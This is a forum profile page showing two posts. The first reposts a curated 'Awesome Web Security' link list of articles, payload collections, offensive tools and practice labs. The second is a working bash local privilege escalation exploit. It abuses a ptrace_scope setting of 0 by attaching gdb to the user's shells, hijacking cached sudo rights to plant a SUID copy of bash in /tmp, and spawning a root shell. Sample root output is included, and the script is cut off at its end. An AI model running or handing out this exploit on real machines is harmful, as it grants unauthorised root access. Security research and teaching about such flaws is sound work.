Jump to content

Nytro

Administrators
  • Posts

    18664
  • Joined

  • Last visited

  • Days Won

    683

Everything posted by Nytro

  1. Awesome Web Security 🐶 Curated list of Web Security materials and resources. Needless to say, most websites suffer from various types of bugs which may eventually lead to vulnerabilities. Why would this happen so often? There can be many factors involved including misconfiguration, shortage of engineers' security skills, etc. To combat this, here is a curated list of Web Security materials and resources for learning cutting edge penetration techniques, and I highly encourage you to read this article "So you want to be a web security researcher?" first. Please read the contribution guidelines before contributing. 🌈 Want to strengthen your penetration skills? I would recommend playing some awesome-ctfs. If you enjoy this awesome list and would like to support it, check out my Patreon page Also, don't forget to check out my repos 🐾 or say hi on my Twitter! Contents Forums Introduction Tips XSS Prototype Pollution CSV Injection SQL Injection Command Injection ORM Injection FTP Injection XXE CSRF Clickjacking SSRF Web Cache Poisoning Relative Path Overwrite Open Redirect SAML Upload Rails AngularJS ReactJS SSL/TLS Webmail NFS AWS Azure Fingerprint Sub Domain Enumeration Crypto Web Shell OSINT Books DNS Rebinding Evasions XXE CSP WAF JSMVC Authentication Tricks CSRF Clickjacking Remote Code Execution XSS SQL Injection NoSQL Injection FTP Injection XXE SSRF Web Cache Poisoning Header Injection URL Others Browser Exploitation PoCs Database Tools Auditing Command Injection Reconnaissance OSINT Sub Domain Enumeration Code Generating Fuzzing Scanning Penetration Testing Leaking Offensive XSS SQL Injection Template Injection XXE CSRF SSRF Detecting Preventing Proxy Webshell Disassembler Decompiler DNS Rebinding Others Social Engineering Database Blogs Twitter Users Practices Application AWS XSS ModSecurity / OWASP ModSecurity Core Rule Set Community Miscellaneous Forums Phrack Magazine - Ezine written by and for hackers. The Hacker News - Security in a serious way. Security Weekly - The security podcast network. The Register - Biting the hand that feeds IT. Dark Reading - Connecting The Information Security Community. HackDig - Dig high-quality web security articles for hacker. Introduction Tips Hacker101 - Written by hackerone. The Daily Swig - Web security digest - Written by PortSwigger. Web Application Security Zone by Netsparker - Written by Netsparker. Infosec Newbie - Written by Mark Robinson. The Magic of Learning - Written by @bitvijays. CTF Field Guide - Written by Trail of Bits. PayloadsAllTheThings - Written by @swisskyrepo. XSS - Cross-Site Scripting Cross-Site Scripting – Application Security – Google - Written by Google. H5SC - Written by @cure53. AwesomeXSS - Written by @s0md3v. XSS.png - Written by @jackmasa. C.XSS Guide - Written by @JakobKallin and Irene Lobo Valbuena. THE BIG BAD WOLF - XSS AND MAINTAINING ACCESS - Written by Paulos Yibelo. payloadbox/xss-payload-list - Written by @payloadbox. PayloadsAllTheThings - XSS Injection - Written by @swisskyrepo. Prototype Pollution Prototype pollution attack in NodeJS application - Written by @HoLyVieR. CSV Injection CSV Injection -> Meterpreter on Pornhub - Written by Andy. The Absurdly Underestimated Dangers of CSV Injection - Written by George Mauer. PayloadsAllTheThings - CSV Injection - Written by @swisskyrepo. SQL Injection SQL Injection Cheat Sheet - Written by @netsparker. SQL Injection Wiki - Written by NETSPI. SQL Injection Pocket Reference - Written by @LightOS. payloadbox/sql-injection-payload-list - Written by @payloadbox. PayloadsAllTheThings - SQL Injection - Written by @swisskyrepo. Command Injection Potential command injection in resolv.rb - Written by @drigg3r. payloadbox/command-injection-payload-list - Written by @payloadbox. PayloadsAllTheThings - Command Injection - Written by @swisskyrepo. ORM Injection HQL for pentesters - Written by @h3xstream. HQL : Hyperinsane Query Language (or how to access the whole SQL API within a HQL injection ?) - Written by @_m0bius. ORM2Pwn: Exploiting injections in Hibernate ORM - Written by Mikhail Egorov. ORM Injection - Written by Simone Onofri. FTP Injection Advisory: Java/Python FTP Injections Allow for Firewall Bypass - Written by Timothy Morgan. SMTP over XXE − how to send emails using Java's XML parser - Written by Alexander Klink. XXE - XML eXternal Entity XXE - Written by @phonexicum. XML external entity (XXE) injection - Written by portswigger. XML Schema, DTD, and Entity Attacks - Written by Timothy D. Morgan and Omar Al Ibrahim. payloadbox/xxe-injection-payload-list - Written by @payloadbox PayloadsAllTheThings - XXE Injection - Written by various contributors. CSRF - Cross-Site Request Forgery Wiping Out CSRF - Written by @jrozner. PayloadsAllTheThings - CSRF Injection - Written by @swisskyrepo. Clickjacking Clickjacking - Written by Imperva. X-Frame-Options: All about Clickjacking? - Written by Mario Heiderich. SSRF - Server-Side Request Forgery SSRF bible. Cheatsheet - Written by Wallarm. PayloadsAllTheThings - Server-Side Request Forgery - Written by @swisskyrepo. Web Cache Poisoning Practical Web Cache Poisoning - Written by @albinowax. PayloadsAllTheThings - Web Cache Deception - Written by @swisskyrepo. Relative Path Overwrite Large-scale analysis of style injection by relative path overwrite - Written by The Morning Paper. MBSD Technical Whitepaper - A few RPO exploitation techniques - Written by Mitsui Bussan Secure Directions, Inc.. Open Redirect Open Redirect Vulnerability - Written by s0cket7. payloadbox/open-redirect-payload-list - Written by @payloadbox. PayloadsAllTheThings - Open Redirect - Written by @swisskyrepo. Security Assertion Markup Language (SAML) How to Hunt Bugs in SAML; a Methodology - Part I - Written by epi. How to Hunt Bugs in SAML; a Methodology - Part II - Written by epi. How to Hunt Bugs in SAML; a Methodology - Part III - Written by epi. PayloadsAllTheThings - SAML Injection - Written by @swisskyrepo. Upload File Upload Restrictions Bypass - Written by Haboob Team. PayloadsAllTheThings - Upload Insecure Files - Written by @swisskyrepo. Rails Rails Security - First part - Written by @qazbnm456. Zen Rails Security Checklist - Written by @brunofacca. Rails SQL Injection - Written by @presidentbeef. Official Rails Security Guide - Written by Rails team. AngularJS XSS without HTML: Client-Side Template Injection with AngularJS - Written by Gareth Heyes. DOM based Angular sandbox escapes - Written by @garethheyes ReactJS XSS via a spoofed React element - Written by Daniel LeCheminant. SSL/TLS SSL & TLS Penetration Testing - Written by APTIVE. Practical introduction to SSL/TLS - Written by @Hakky54. Webmail Why mail() is dangerous in PHP - Written by Robin Peraglie. NFS NFS | PENETRATION TESTING ACADEMY - Written by PENETRATION ACADEMY. AWS PENETRATION TESTING AWS STORAGE: KICKING THE S3 BUCKET - Written by Dwight Hohnstein from Rhino Security Labs. AWS PENETRATION TESTING PART 1. S3 BUCKETS - Written by VirtueSecurity. AWS PENETRATION TESTING PART 2. S3, IAM, EC2 - Written by VirtueSecurity. Azure Common Azure Security Vulnerabilities and Misconfigurations - Written by @rhinobenjamin. Cloud Security Risks (Part 1): Azure CSV Injection Vulnerability - Written by @spengietz. Fingerprint Sub Domain Enumeration A penetration tester’s guide to sub-domain enumeration - Written by Bharath. The Art of Subdomain Enumeration - Written by Patrik Hudak. Crypto Applied Crypto Hardening - Written by The bettercrypto.org Team. Web Shell Hunting for Web Shells - Written by Jacob Baines. Hacking with JSP Shells - Written by @_nullbind. OSINT Hacking Cryptocurrency Miners with OSINT Techniques - Written by @s3yfullah. OSINT x UCCU Workshop on Open Source Intelligence - Written by Philippe Lin. 102 Deep Dive in the Dark Web OSINT Style Kirby Plessas - Presented by @kirbstr. The most complete guide to finding anyone’s email - Written by Timur Daudpota. Books XSS Cheat Sheet - 2018 Edition - Written by @brutelogic. DNS Rebinding Attacking Private Networks from the Internet with DNS Rebinding - Written by @brannondorsey Hacking home routers from the Internet - Written by @radekk Evasions XXE Bypass Fix of OOB XXE Using Different encoding - Written by @SpiderSec. CSP Any protection against dynamic module import? - Written by @shhnjk. CSP: bypassing form-action with reflected XSS - Written by Detectify Labs. TWITTER XSS + CSP BYPASS - Written by Paulos Yibelo. Neatly bypassing CSP - Written by Wallarm. Evading CSP with DOM-based dangling markup - Written by portswigger. GitHub's CSP journey - Written by @ptoomey3. GitHub's post-CSP journey - Written by @ptoomey3. WAF Web Application Firewall (WAF) Evasion Techniques - Written by @secjuice. Web Application Firewall (WAF) Evasion Techniques #2 - Written by @secjuice. Airbnb – When Bypassing JSON Encoding, XSS Filter, WAF, CSP, and Auditor turns into Eight Vulnerabilities - Written by @Brett Buerhaus. How to bypass libinjection in many WAF/NGWAF - Written by @d0znpp. JSMVC JavaScript MVC and Templating Frameworks - Written by Mario Heiderich. Authentication Trend Micro Threat Discovery Appliance - Session Generation Authentication Bypass (CVE-2016-8584) - Written by @malerisch and @steventseeley. Tricks CSRF Neat tricks to bypass CSRF-protection - Written by Twosecurity. Exploiting CSRF on JSON endpoints with Flash and redirects - Written by @riyazwalikar. Stealing CSRF tokens with CSS injection (without iFrames) - Written by @dxa4481. Cracking Java’s RNG for CSRF - Javax Faces and Why CSRF Token Randomness Matters - Written by @rramgattie. Clickjacking Clickjackings in Google worth 14981.7$ - Written by @raushanraj_65039. Remote Code Execution CVE-2019-1306: ARE YOU MY INDEX? - Written by @yu5k3. WebLogic RCE (CVE-2019-2725) Debug Diary - Written by Badcode@Knownsec 404 Team. What Do WebLogic, WebSphere, JBoss, Jenkins, OpenNMS, and Your Application Have in Common? This Vulnerability. - Written by @breenmachine. Exploiting Node.js deserialization bug for Remote Code Execution - Written by OpSecX. DRUPAL 7.X SERVICES MODULE UNSERIALIZE() TO RCE - Written by Ambionics Security. How we exploited a remote code execution vulnerability in math.js - Written by @capacitorset. GitHub Enterprise Remote Code Execution - Written by @iblue. Evil Teacher: Code Injection in Moodle - Written by RIPS Technologies. How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! - Written by Orange. $36k Google App Engine RCE - Written by Ezequiel Pereira. Poor RichFaces - Written by CODE WHITE. Remote Code Execution on a Facebook server - Written by @blaklis_. XSS Exploiting XSS with 20 characters limitation - Written by Jorge Lajara. Upgrade self XSS to Exploitable XSS an 3 Ways Technic - Written by HAHWUL. XSS without parentheses and semi-colons - Written by @garethheyes. XSS-Auditor — the protector of unprotected and the deceiver of protected. - Written by @terjanq. Query parameter reordering causes redirect page to render unsafe URL - Written by kenziy. ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes, and everything else - Written by Mario Heiderich. How I found a $5,000 Google Maps XSS (by fiddling with Protobuf) - Written by @marin_m. DON'T TRUST THE DOM: BYPASSING XSS MITIGATIONS VIA SCRIPT GADGETS - Written by Sebastian Lekies, Krzysztof Kotowicz, and Eduardo Vela. Uber XSS via Cookie - Written by zhchbin. DOM XSS – auth.uber.com - Written by StamOne_. Stored XSS on Facebook - Written by Enguerran Gillier. XSS in Google Colaboratory + CSP bypass - Written by Michał Bentkowski. Another XSS in Google Colaboratory - Written by Michał Bentkowski. </script> is filtered ? - Written by @strukt93. SQL Injection MySQL Error Based SQL Injection Using EXP - Written by @osandamalith. SQL injection in an UPDATE query - a bug bounty story! - Written by Zombiehelp54. GitHub Enterprise SQL Injection - Written by Orange. Making a Blind SQL Injection a little less blind - Written by TomNomNom. Red Team Tales 0x01: From MSSQL to RCE - Written by Tarlogic. NoSQL Injection GraphQL NoSQL Injection Through JSON Types - Written by Pete. FTP Injection XML Out-Of-Band Data Retrieval - Written by @a66at and Alexey Osipov. XXE OOB exploitation at Java 1.7+ - Written by Ivan Novikov. XXE Evil XML with two encodings - Written by Arseniy Sharoglazov. XXE in WeChat Pay Sdk ( WeChat leave a backdoor on merchant websites) - Written by Rose Jackcode. XML Out-Of-Band Data Retrieval - Written by Timur Yunusov and Alexey Osipov. XXE OOB exploitation at Java 1.7+ (2014): Exfiltration using FTP protocol - Written by Ivan Novikov. XXE OOB extracting via HTTP+FTP using single opened port - Written by skavans. What You Didn't Know About XML External Entities Attacks - Written by Timothy D. Morgan. Pre-authentication XXE vulnerability in the Services Drupal module - Written by Renaud Dubourguais. Forcing XXE Reflection through Server Error Messages - Written by Antti Rantasaari. Exploiting XXE with local DTD files - Written by Arseniy Sharoglazov. Automating local DTD discovery for XXE exploitation - Written by Philippe Arteau. SSRF AWS takeover through SSRF in JavaScript - Written by Gwen. SSRF in Exchange leads to ROOT access in all instances - Written by @0xacb. SSRF to ROOT Access - A $25k bounty for SSRF leading to ROOT Access in all instances by 0xacb. PHP SSRF Techniques - Written by @themiddleblue. SSRF in https://imgur.com/vidgif/url - Written by aesteral. All you need to know about SSRF and how may we write tools to do auto-detect - Written by @Auxy233. A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! - Written by Orange. SSRF Tips - Written by xl7dev. Into the Borg – SSRF inside Google production network - Written by opnsec. Piercing the Veil: Server Side Request Forgery to NIPRNet access - Written by Alyssa Herrera. Web Cache Poisoning Bypassing Web Cache Poisoning Countermeasures - Written by @albinowax. Cache poisoning and other dirty tricks - Written by Wallarm. Header Injection Java/Python FTP Injections Allow for Firewall Bypass - Written by Timothy Morgan. URL Some Problems Of URLs - Written by Chris Palmer. Phishing with Unicode Domains - Written by Xudong Zheng. Unicode Domains are bad and you should feel bad for supporting them - Written by VRGSEC. [dev.twitter.com] XSS - Written by Sergey Bobrov. Others How I hacked Google’s bug tracking system itself for $15,600 in bounties - Written by @alex.birsan. Some Tricks From My Secret Group - Written by phithon. Inducing DNS Leaks in Onion Web Services - Written by @epidemics-scepticism. Stored XSS, and SSRF in Google using the Dataset Publishing Language - Written by @signalchaos. Browser Exploitation Frontend (like SOP bypass, URL spoofing, and something like that) The world of Site Isolation and compromised renderer - Written by @shhnjk. The Cookie Monster in Your Browsers - Written by @filedescriptor. Bypassing Mobile Browser Security For Fun And Profit - Written by @rafaybaloch. The inception bar: a new phishing method - Written by jameshfisher. JSON hijacking for the modern web - Written by portswigger. IE11 Information disclosure - local file detection - Written by James Lee. SOP bypass / UXSS – Stealing Credentials Pretty Fast (Edge) - Written by Manuel. Особенности Safari в client-side атаках - Written by Bo0oM. How do we Stop Spilling the Beans Across Origins? - Written by aaj at google.com and mkwst at google.com. Setting arbitrary request headers in Chromium via CRLF injection - Written by Michał Bentkowski. I’m harvesting credit card numbers and passwords from your site. Here’s how. - Written by David Gilbertson. Backend (core of Browser implementation, and often refers to C or C++ part) Breaking UC Browser - Written by Доктор Веб. Attacking JavaScript Engines - A case study of JavaScriptCore and CVE-2016-4622 - Written by phrack@saelo.net. Three roads lead to Rome - Written by @holynop. Exploiting a V8 OOB write. - Written by @halbecaf. SSD Advisory – Chrome Turbofan Remote Code Execution - Written by SecuriTeam Secure Disclosure (SSD). Look Mom, I don't use Shellcode - Browser Exploitation Case Study for Internet Explorer 11 - Written by @moritzj. PUSHING WEBKIT'S BUTTONS WITH A MOBILE PWN2OWN EXPLOIT - Written by @wanderingglitch. A Methodical Approach to Browser Exploitation - Written by RET2 SYSTEMS, INC. CVE-2017-2446 or JSC::JSGlobalObject::isHavingABadTime. - Written by Diary of a reverse-engineer. PoCs Database js-vuln-db - Collection of JavaScript engine CVEs with PoCs by @tunz. awesome-cve-poc - Curated list of CVE PoCs by @qazbnm456. Some-PoC-oR-ExP - 各种漏洞poc、Exp的收集或编写 by @coffeehb. uxss-db - Collection of UXSS CVEs with PoCs by @Metnew. SPLOITUS - Exploits & Tools Search Engine by @i_bo0om. Exploit Database - ultimate archive of Exploits, Shellcode, and Security Papers by Offensive Security. Tools Auditing prowler - Tool for AWS security assessment, auditing and hardening by @Alfresco. slurp - Evaluate the security of S3 buckets by @hehnope. A2SV - Auto Scanning to SSL Vulnerability by @hahwul. Command Injection commix - Automated All-in-One OS command injection and exploitation tool by @commixproject. Reconnaissance OSINT - Open-Source Intelligence Shodan - Shodan is the world's first search engine for Internet-connected devices by @shodanhq. Censys - Censys is a search engine that allows computer scientists to ask questions about the devices and networks that compose the Internet by University of Michigan. urlscan.io - Service which analyses websites and the resources they request by @heipei. ZoomEye - Cyberspace Search Engine by @zoomeye_team. FOFA - Cyberspace Search Engine by BAIMAOHUI. NSFOCUS - THREAT INTELLIGENCE PORTAL by NSFOCUS GLOBAL. Photon - Incredibly fast crawler designed for OSINT by @s0md3v. FOCA - FOCA (Fingerprinting Organizations with Collected Archives) is a tool used mainly to find metadata and hidden information in the documents its scans by ElevenPaths. SpiderFoot - Open source footprinting and intelligence-gathering tool by @binarypool. xray - XRay is a tool for recon, mapping and OSINT gathering from public networks by @evilsocket. gitrob - Reconnaissance tool for GitHub organizations by @michenriksen. GSIL - Github Sensitive Information Leakage(Github敏感信息泄露)by @FeeiCN. raven - raven is a Linkedin information gathering tool that can be used by pentesters to gather information about an organization employees using Linkedin by @0x09AL. ReconDog - Reconnaissance Swiss Army Knife by @s0md3v. Databases - start.me - Various databases which you can use for your OSINT research by @technisette. peoplefindThor - the easy way to find people on Facebook by [postkassen](mailto:postkassen@oejvind.dk?subject=peoplefindthor.dk comments). tinfoleak - The most complete open-source tool for Twitter intelligence analysis by @vaguileradiaz. Raccoon - High performance offensive security tool for reconnaissance and vulnerability scanning by @evyatarmeged. Social Mapper - Social Media Enumeration & Correlation Tool by Jacob Wilkin(Greenwolf) by @SpiderLabs. espi0n/Dockerfiles - Dockerfiles for various OSINT tools by @espi0n. Sub Domain Enumeration Sublist3r - Sublist3r is a multi-threaded sub-domain enumeration tool for penetration testers by @aboul3la. EyeWitness - EyeWitness is designed to take screenshots of websites, provide some server header info, and identify default credentials if possible by @ChrisTruncer. subDomainsBrute - A simple and fast sub domain brute tool for pentesters by @lijiejie. AQUATONE - Tool for Domain Flyovers by @michenriksen. domain_analyzer - Analyze the security of any domain by finding all the information possible by @eldraco. VirusTotal domain information - Searching for domain information by VirusTotal. Certificate Transparency - Google's Certificate Transparency project fixes several structural flaws in the SSL certificate system by @google. Certificate Search - Enter an Identity (Domain Name, Organization Name, etc), a Certificate Fingerprint (SHA-1 or SHA-256) or a crt.sh ID to search certificate(s) by @crtsh. GSDF - Domain searcher named GoogleSSLdomainFinder by @We5ter. Code Generating VWGen - Vulnerable Web applications Generator by @qazbnm456. Fuzzing wfuzz - Web application bruteforcer by @xmendez. charsetinspect - Script that inspects multi-byte character sets looking for characters with specific user-defined properties by @hack-all-the-things. IPObfuscator - Simple tool to convert the IP to a DWORD IP by @OsandaMalith. domato - DOM fuzzer by @google. FuzzDB - Dictionary of attack patterns and primitives for black-box application fault injection and resource discovery. dirhunt - Web crawler optimized for searching and analyzing the directory structure of a site by @nekmo. ssltest - Online service that performs a deep analysis of the configuration of any SSL web server on the public internet. Provided by Qualys SSL Labs. fuzz.txt - Potentially dangerous files by @Bo0oM. Scanning wpscan - WPScan is a black box WordPress vulnerability scanner by @wpscanteam. JoomlaScan - Free software to find the components installed in Joomla CMS, built out of the ashes of Joomscan by @drego85. WAScan - Is an open source web application security scanner that uses "black-box" method, created by @m4ll0k. Penetration Testing Burp Suite - Burp Suite is an integrated platform for performing security testing of web applications by portswigger. TIDoS-Framework - A comprehensive web application audit framework to cover up everything from Reconnaissance and OSINT to Vulnerability Analysis by @_tID. Astra - Automated Security Testing For REST API's by @flipkart-incubator. aws_pwn - A collection of AWS penetration testing junk by @dagrz. grayhatwarfare - Public buckets by grayhatwarfare. Offensive XSS - Cross-Site Scripting beef - The Browser Exploitation Framework Project by beefproject. JShell - Get a JavaScript shell with XSS by @s0md3v. XSStrike - XSStrike is a program which can fuzz and bruteforce parameters for XSS. It can also detect and bypass WAFs by @s0md3v. xssor2 - XSS'OR - Hack with JavaScript by @evilcos. SQL Injection sqlmap - Automatic SQL injection and database takeover tool. Template Injection tplmap - Code and Server-Side Template Injection Detection and Exploitation Tool by @epinna. XXE dtd-finder - List DTDs and generate XXE payloads using those local DTDs by @GoSecure. Cross Site Request Forgery XSRFProbe - The Prime CSRF Audit & Exploitation Toolkit by @0xInfection. Server-Side Request Forgery Open redirect/SSRF payload generator - Open redirect/SSRF payload generator by intigriti. Leaking HTTPLeaks - All possible ways, a website can leak HTTP requests by @cure53. dvcs-ripper - Rip web accessible (distributed) version control systems: SVN/GIT/HG... by @kost. DVCS-Pillage - Pillage web accessible GIT, HG and BZR repositories by @evilpacket. GitMiner - Tool for advanced mining for content on Github by @UnkL4b. gitleaks - Searches full repo history for secrets and keys by @zricethezav. CSS-Keylogging - Chrome extension and Express server that exploits keylogging abilities of CSS by @maxchehab. pwngitmanager - Git manager for pentesters by @allyshka. snallygaster - Tool to scan for secret files on HTTP servers by @hannob. LinkFinder - Python script that finds endpoints in JavaScript files by @GerbenJavado. Detecting sqlchop - SQL injection detection engine by chaitin. xsschop - XSS detection engine by chaitin. retire.js - Scanner detecting the use of JavaScript libraries with known vulnerabilities by @RetireJS. malware-jail - Sandbox for semi-automatic Javascript malware analysis, deobfuscation and payload extraction by @HynekPetrak. repo-supervisor - Scan your code for security misconfiguration, search for passwords and secrets. bXSS - bXSS is a simple Blind XSS application adapted from cure53.de/m by @LewisArdern. OpenRASP - An open source RASP solution actively maintained by Baidu Inc. With context-aware detection algorithm the project achieved nearly no false positives. And less than 3% performance reduction is observed under heavy server load. GuardRails - A GitHub App that provides security feedback in Pull Requests. Preventing DOMPurify - DOM-only, super-fast, uber-tolerant XSS sanitizer for HTML, MathML and SVG by Cure53. js-xss - Sanitize untrusted HTML (to prevent XSS) with a configuration specified by a Whitelist by @leizongmin. Acra - Client-side encryption engine for SQL databases, with strong selective encryption, SQL injections prevention and intrusion detection by @cossacklabs. Proxy Charles - HTTP proxy / HTTP monitor / Reverse Proxy that enables a developer to view all of the HTTP and SSL / HTTPS traffic between their machine and the Internet. mitmproxy - Interactive TLS-capable intercepting HTTP proxy for penetration testers and software developers by @mitmproxy. Webshell nano - Family of code golfed PHP shells by @s0md3v. webshell - This is a webshell open source project by @tennc. Weevely - Weaponized web shell by @epinna. Webshell-Sniper - Manage your website via terminal by @WangYihang. Reverse-Shell-Manager - Reverse Shell Manager via Terminal @WangYihang. reverse-shell - Reverse Shell as a Service by @lukechilds. Disassembler plasma - Plasma is an interactive disassembler for x86/ARM/MIPS by @plasma-disassembler. radare2 - Unix-like reverse engineering framework and commandline tools by @radare. Iaitō - Qt and C++ GUI for radare2 reverse engineering framework by @hteso. Decompiler CFR - Another java decompiler by @LeeAtBenf. DNS Rebinding DNS Rebind Toolkit - DNS Rebind Toolkit is a frontend JavaScript framework for developing DNS Rebinding exploits against vulnerable hosts and services on a local area network (LAN) by @brannondorsey dref - DNS Rebinding Exploitation Framework. Dref does the heavy-lifting for DNS rebinding by @mwrlabs Singularity of Origin - It includes the necessary components to rebind the IP address of the attack server DNS name to the target machine's IP address and to serve attack payloads to exploit vulnerable software on the target machine by @nccgroup Whonow DNS Server - A malicious DNS server for executing DNS Rebinding attacks on the fly by @brannondorsey Others Dnslogger - DNS Logger by @iagox86. CyberChef - The Cyber Swiss Army Knife - a web app for encryption, encoding, compression and data analysis - by @GCHQ. ntlm_challenger - Parse NTLM over HTTP challenge messages by @b17zr. cefdebug - Minimal code to connect to a CEF debugger by @taviso. ctftool - Interactive CTF Exploration Tool by @taviso. Social Engineering Database haveibeenpwned - Check if you have an account that has been compromised in a data breach by Troy Hunt. Blogs Orange - Taiwan's talented web penetrator. leavesongs - China's talented web penetrator. James Kettle - Head of Research at PortSwigger Web Security. Broken Browser - Fun with Browser Vulnerabilities. Scrutiny - Internet Security through Web Browsers by Dhiraj Mishra. BRETT BUERHAUS - Vulnerability disclosures and rambles on application security. n0tr00t - ~# n0tr00t Security Team. OpnSec - Open Mind Security! RIPS Technologies - Write-ups for PHP vulnerabilities. 0Day Labs - Awesome bug-bounty and challenges writeups. Blog of Osanda - Security Researching and Reverse Engineering. Twitter Users @HackwithGitHub - Initiative to showcase open source hacking tools for hackers and pentesters @filedescriptor - Active penetrator often tweets and writes useful articles @cure53berlin - Cure53 is a German cybersecurity firm. @XssPayloads - The wonderland of JavaScript unexpected usages, and more. @kinugawamasato - Japanese web penetrator. @h3xstream - Security Researcher, interested in web security, crypto, pentest, static analysis but most of all, samy is my hero. @garethheyes - English web penetrator. @hasegawayosuke - Japanese javascript security researcher. @shhnjk - Web and Browsers Security Researcher. Practices Application OWASP Juice Shop - Probably the most modern and sophisticated insecure web application - Written by @bkimminich and the @owasp_juiceshop team. BadLibrary - Vulnerable web application for training - Written by @SecureSkyTechnology. Hackxor - Realistic web application hacking game - Written by @albinowax. SELinux Game - Learn SELinux by doing. Solve Puzzles, show skillz - Written by @selinuxgame. Portswigger Web Security Academy - Free trainings and labs - Written by PortSwigger. AWS FLAWS - Amazon AWS CTF challenge - Written by @0xdabbad00. CloudGoat - Rhino Security Labs' "Vulnerable by Design" AWS infrastructure setup tool - Written by @RhinoSecurityLabs. XSS XSS game - Google XSS Challenge - Written by Google. prompt(1) to win - Complex 16-Level XSS Challenge held in summer 2014 (+4 Hidden Levels) - Written by @cure53. alert(1) to win - Series of XSS challenges - Written by @steike. XSS Challenges - Series of XSS challenges - Written by yamagata21. ModSecurity / OWASP ModSecurity Core Rule Set ModSecurity / OWASP ModSecurity Core Rule Set - Series of tutorials to install, configure and tune ModSecurity and the Core Rule Set - Written by @ChrFolini. Community Reddit Stack Overflow Miscellaneous awesome-bug-bounty - Comprehensive curated list of available Bug Bounty & Disclosure Programs and write-ups by @djadmin. bug-bounty-reference - List of bug bounty write-up that is categorized by the bug nature by @ngalongc. Google VRP and Unicorns - Written by Daniel Stelter-Gliese. Brute Forcing Your Facebook Email and Phone Number - Written by PwnDizzle. Pentest + Exploit dev Cheatsheet wallpaper - Penetration Testing and Exploit Dev CheatSheet. The Definitive Security Data Science and Machine Learning Guide - Written by JASON TROS. EQGRP - Decrypted content of eqgrp-auction-file.tar.xz by @x0rz. notes - Some public notes by @ChALkeR. A glimpse into GitHub's Bug Bounty workflow - Written by @gregose. Cybersecurity Campaign Playbook - Written by Belfer Center for Science and International Affairs. Infosec_Reference - Information Security Reference That Doesn't Suck by @rmusser01. Internet of Things Scanner - Check if your internet-connected devices at home are public on Shodan by BullGuard. The Bug Hunters Methodology v2.1 - Written by @jhaddix. $7.5k Google services mix-up - Written by Ezequiel Pereira. How I exploited ACME TLS-SNI-01 issuing Let's Encrypt SSL-certs for any domain using shared hosting - Written by @fransrosen. TL:DR: VPN leaks users’ IPs via WebRTC. I’ve tested seventy VPN providers and 16 of them leaks users’ IPs via WebRTC (23%) - Written by voidsec. Escape and Evasion Egressing Restricted Networks - Written by Chris Patten, Tom Steele. Be careful what you copy: Invisibly inserting usernames into text with Zero-Width Characters - Written by @umpox. Domato Fuzzer's Generation Engine Internals - Written by sigpwn. CSS Is So Overpowered It Can Deanonymize Facebook Users - Written by Ruslan Habalov. Introduction to Web Application Security - Written by @itsC0rg1, @jmkeads and @matir. Finding The Real Origin IPs Hiding Behind CloudFlare or TOR - Written by Paul Dannewitz. Why Facebook's api starts with a for loop - Written by @AntoGarand. How I could have stolen your photos from Google - my first 3 bug bounty writeups - Written by @gergoturcsanyi. An example why NAT is NOT security - Written by @0daywork. WEB APPLICATION PENETRATION TESTING NOTES - Written by Jayson. Hacking with a Heads Up Display - Written by David Scrobonia. Alexa Top 1 Million Security - Hacking the Big Ones - Written by @slashcrypto. The bug bounty program that changed my life - Written by Gwen. List of bug bounty writeups - Written by Mariem. Code of Conduct Please note that this project is released with a Contributor Code of Conduct. By participating in this project you agree to abide by its terms. License To the extent possible under law, @qazbnm456 has waived all copyright and related or neighboring rights to this work. Sursa: https://github.com/qazbnm456/awesome-web-security/blob/master/README.md
  2. #!/usr/bin/env bash ####################################################### # # # 'ptrace_scope' misconfiguration # # Local Privilege Escalation # # # ####################################################### # Affected operating systems (TESTED): # Parrot Home/Workstation 4.6 (Latest Version) # Parrot Security 4.6 (Latest Version) # CentOS / RedHat 7.6 (Latest Version) # Kali Linux 2018.4 (Latest Version) # Authors: Marcelo Vazquez (s4vitar) # Victor Lasa (vowkin) #┌─[s4vitar@parrot]─[~/Desktop/Exploit/Privesc] #└──╼ $./exploit.sh # #[*] Checking if 'ptrace_scope' is set to 0... [√] #[*] Checking if 'GDB' is installed... [√] #[*] System seems vulnerable! [√] # #[*] Starting attack... #[*] PID -> sh #[*] Path 824: /home/s4vitar #[*] PID -> bash #[*] Path 832: /home/s4vitar/Desktop/Exploit/Privesc #[*] PID -> sh #[*] Path #[*] PID -> sh #[*] Path #[*] PID -> sh #[*] Path #[*] PID -> sh #[*] Path #[*] PID -> bash #[*] Path 1816: /home/s4vitar/Desktop/Exploit/Privesc #[*] PID -> bash #[*] Path 1842: /home/s4vitar #[*] PID -> bash #[*] Path 1852: /home/s4vitar/Desktop/Exploit/Privesc #[*] PID -> bash #[*] Path 1857: /home/s4vitar/Desktop/Exploit/Privesc # #[*] Cleaning up... [√] #[*] Spawning root shell... [√] # #bash-4.4# whoami #root #bash-4.4# id #uid=1000(s4vitar) gid=1000(s4vitar) euid=0(root) egid=0(root) grupos=0(root),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(debian-tor),124(bluetooth),136(scanner),1000(s4vitar) #bash-4.4# function startAttack(){ tput civis && pgrep "^(echo $(cat /etc/shells | tr '/' ' ' | awk 'NF{print $NF}' | tr '\n' '|'))$" -u "$(id -u)" | sed '$ d' | while read shell_pid; do if [ $(cat /proc/$shell_pid/comm 2>/dev/null) ] || [ $(pwdx $shell_pid 2>/dev/null) ]; then echo "[*] PID -> "$(cat "/proc/$shell_pid/comm" 2>/dev/null) echo "[*] Path $(pwdx $shell_pid 2>/dev/null)" fi; echo 'call system("echo | sudo -S cp /bin/bash /tmp >/dev/null 2>&1 && echo | sudo -S chmod +s /tmp/bash >/dev/null 2>&1")' | gdb -q -n -p "$shell_pid" >/dev/null 2>&1 done if [ -f /tmp/bash ]; then /tmp/bash -p -c 'echo -ne "\n[*] Cleaning up..." rm /tmp/bash echo -e " [√]" echo -ne "[*] Spawning root shell..." echo -e " [√]\n" tput cnorm && bash -p' else echo -e "\n[*] Could not copy SUID to /tmp/bash [✗]" fi } echo -ne "[*] Checking if 'ptrace_scope' is set to 0..." if grep -q "0" < /proc/sys/kernel/yama/ptrace_scope; then echo " [√]" echo -ne "[*] Checking if 'GDB' is installed..." if command -v gdb >/dev/null 2>&1; then echo -e " [√]" echo -e "[*] System seems vulnerable! [√]\n" echo -e "[*] Starting attack..." startAttack else echo " [✗]" echo "[*] System is NOT vulnerable :( [✗]" fi else 